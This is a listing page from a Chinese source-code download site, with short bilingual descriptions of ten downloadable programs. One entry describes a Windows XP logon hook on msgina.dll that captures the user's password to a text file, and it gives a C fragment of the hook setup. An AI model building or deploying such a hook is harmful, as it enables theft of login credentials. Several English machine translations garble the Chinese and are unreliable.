-
这个是旅行查询系统,模拟查询旅游路线。欢迎使用,希望大家提供意见。...
这个是旅行查询系统,模拟查询旅游路线。欢迎使用,希望大家提供意见。-This is a travel query system, simulating travel route inquiries. Welcome, I hope to advise the U.S..
- 2022-01-25 23:30:03下载
- 积分:1
-
squid3.0及以后的版本相对于squid2系列有所改变,主要是把squid2系列的源代码由C换为了C++,同时增加了一些rfc文档里所描述的功能...
squid3.0及以后的版本相对于squid2系列有所改变,主要是把squid2系列的源代码由C换为了C++,同时增加了一些rfc文档里所描述的功能-squid3.0 and subsequent versions as opposed to a change in squid2 series is meant to give the series squid2 source code from the C-for for C , while increasing the number of rfc document described the function of
- 2022-01-24 16:11:31下载
- 积分:1
-
一个很好的SOKET通信程序,包括客户端和服务器端,编译时候带参数/c或者/s...
一个很好的SOKET通信程序,包括客户端和服务器端,编译时候带参数/c或者/s-a good socket communication program, including client and server sides. Compile with parameter /c or /s
- 2022-02-02 15:33:35下载
- 积分:1
-
C#编程如何获取进程主窗口以及创建进程的执行程序
C#编程如何获取进程主窗口以及创建进程的执行程序 -C# programming process for obtaining the main window and the creation of the process of enforcement procedures
- 2022-09-19 00:30:03下载
- 积分:1
-
BSIM3模型源代码
BSIM3v3 模型的源代码-BSIM3v3 model source code
- 2022-01-22 13:28:07下载
- 积分:1
-
介绍如何在你现有的图形程序中加入对顶点和片段的高级着色。采用CG着色语言...
介绍如何在你现有的图形程序中加入对顶点和片段的高级着色。采用CG着色语言-How to introduce your existing graphics program to add on the vertex and fragment shader senior. The use of CG shading language
- 2023-07-29 09:55:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
这是一个vb做的定时器小程序,看看对大家是否有帮助,谢谢!...
这是一个vb做的定时器小程序,看看对大家是否有帮助,谢谢!-This is a vb timer so small procedures to see whether there is help for all of us, thank you!
- 2022-04-12 09:53:41下载
- 积分:1
-
Prepared using VC dashboard display data source code, you can set the upper and...
用VC编写的仪表盘显示数据源代码,可设置上下限,默认值等-Prepared using VC dashboard display data source code, you can set the upper and lower limits, defaults, etc.
- 2022-02-03 20:33:17下载
- 积分:1
-
many video playback software or video editing software to build frames for the f...
很多视频播放软件或视频编辑软件都提供了抓帧的功能,本代码就实现此功能.-many video playback software or video editing software to build frames for the functions of the code on the realization of this function.
- 2022-03-16 12:05:43下载
- 积分:1